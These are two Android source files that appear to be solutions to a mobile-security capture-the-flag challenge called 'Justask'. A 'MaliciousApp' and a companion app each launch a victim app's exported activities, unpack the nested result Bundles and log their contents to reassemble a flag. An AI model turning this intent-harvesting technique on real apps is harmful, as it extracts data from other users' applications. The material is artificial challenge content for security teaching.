File: Challenges/2 - Justask/justasksolution/MaliciousApp/app/src/main/java/com/example/maliciousapp/MainActivity.java
package com.example.maliciousapp;

import androidx.activity.result.ActivityResultLauncher;
import androidx.activity.result.contract.ActivityResultContracts;
import androidx.appcompat.app.AppCompatActivity;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

import java.util.Iterator;

public class MainActivity extends AppCompatActivity {

    private static final String TAG = "MOBIOTSEC";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }

    @Override
    protected void onStart() {
        super.onStart();

        ActivityResultLauncher<Intent> someActivityResultLauncher = registerForActivityResult(
                new ActivityResultContracts.StartActivityForResult(),
                result -> {

                    Intent data = result.getData();
                    assert data != null;
                    if(result.getResultCode() != 4) {
                        for (String p : data.getExtras().keySet()) {
                            Log.i(TAG, "key: " + p + " value: " + data.getExtras().getString(p));
                        }
                    }

                    if(result.getResultCode() == 4){

                        Bundle b1 = (Bundle) data.getExtras().getBundle("follow");
                        String mykey = "";
                        StringBuilder message = new StringBuilder();
                        Iterator<String> t = b1.keySet().iterator();

                        while(true) {
                            while (t.hasNext()) {
                                mykey = t.next();
                                message.append(mykey);
                                Log.i(TAG, "key (last piece):" + mykey + " value " + b1.getString(mykey));
                            }
                            try {
                                b1 = (Bundle) b1.getBundle(mykey);
                                t = b1.keySet().iterator();
                            } catch(NullPointerException | ClassCastException cce){
                                Log.i(TAG, "casting failure or nullpointer");
                                break;
                            }
                        }
                    }

                });

        Intent intent1 = new Intent();
        intent1.setComponent(new ComponentName("com.example.victimapp", "com.example.victimapp.PartOne"));
        if (intent1.resolveActivity(getPackageManager()) != null) {
            intent1.putExtra("requestCode", 1);
            someActivityResultLauncher.launch(intent1);
        }

        Intent intent2 = new Intent("com.example.victimapp.intent.action.JUSTASK");
        if (intent2.resolveActivity(getPackageManager()) != null) {
            intent2.putExtra("requestCode", 2);
            someActivityResultLauncher.launch(intent2);
        }

        Intent intent3 = new Intent();
        intent3.setComponent(new ComponentName("com.example.victimapp", "com.example.victimapp.PartThree"));
        if (intent3.resolveActivity(getPackageManager()) != null) {
            intent3.putExtra("requestCode", 3);
            someActivityResultLauncher.launch(intent3);
        }

        Intent intent4 = new Intent("com.example.victimapp.intent.action.JUSTASKBUTNOTSOSIMPLE");
        if (intent4.resolveActivity(getPackageManager()) != null) {
            intent4.putExtra("requestCode", 4);
            someActivityResultLauncher.launch(intent4);
        }

    }

}

File: Challenges/2 - Justask/Justask/app/src/main/java/com/example/justask/MainActivity.kt
package com.example.justask

import android.content.ComponentName
import android.content.Intent
import android.os.Bundle
import android.util.Log
import androidx.activity.ComponentActivity

class MainActivity : ComponentActivity() {

    private val TAG = "MOBIOTSEC"
    private val PART_ONE = 1
    private val PART_TWO = 2
    private val PART_THREE = 3
    private val PART_FOUR = 4

    private val flag = arrayOfNulls<String>(4)
    private var counter = 0

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)

        Log.i(TAG, "Entered main")

        try {
            // PartOne
            val intentPartOne = Intent()
            intentPartOne.component = ComponentName("com.example.victimapp", "com.example.victimapp.PartOne")
            startActivityForResult(intentPartOne, PART_ONE)
            Log.i(TAG, "Sent Part $PART_ONE")

            // PartTwo
            val intentPartTwo = Intent("com.example.victimapp.intent.action.JUSTASK")
            startActivityForResult(intentPartTwo, PART_TWO)
            Log.i(TAG, "Sent Part $PART_TWO")

            // PartThree
            val intentPartThree = Intent()
            intentPartThree.component = ComponentName("com.example.victimapp", "com.example.victimapp.PartThree")
            startActivityForResult(intentPartThree, PART_THREE)
            Log.i(TAG, "Sent Part $PART_THREE")

            // PartFour
            val intentPartFour = Intent("com.example.victimapp.intent.action.JUSTASKBUTNOTSOSIMPLE")
            startActivityForResult(intentPartFour, PART_FOUR)
            Log.i(TAG, "Sent Part $PART_FOUR")
        } catch (ex: Exception) {
            Log.e(TAG, ex.toString())
        }
    }

    private fun decryptBundle(intent: Intent): String {
        val flagPart = StringBuilder()

        fun extractFlagFromBundle(bundle: Bundle) {
            for (key in bundle.keySet()) {
                val value = bundle.get(key)
                if (value is Bundle) {
                    extractFlagFromBundle(value) // Recursively extract from nested Bundles
                } else {
                    flagPart.append("$key: $value\n")
                    if (key == "flag" && flagPart.contains("FLAG{")) {
                        // Stop if we found the complete flag
                        return
                    }
                }
            }
        }

        val extras = intent.extras
        if (extras != null) {
            extractFlagFromBundle(extras)
        }

        return flagPart.toString()
    }

    override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
        super.onActivityResult(requestCode, resultCode, data)

        Log.i(TAG, "Got data from Part $requestCode")

        if (data != null) {
            val flagPart = decryptBundle(data)

            flag[requestCode - 1] = flagPart
            counter++

            Log.i(TAG, "Received Part $requestCode:\n$flagPart")

            if (counter == 4) {
                val completeFlag = flag.joinToString("")
                Log.i(TAG, "Complete Flag:\n$completeFlag")
            }
        } else {
            Log.e(TAG, "Received null data from Part $requestCode")
        }
    }
}
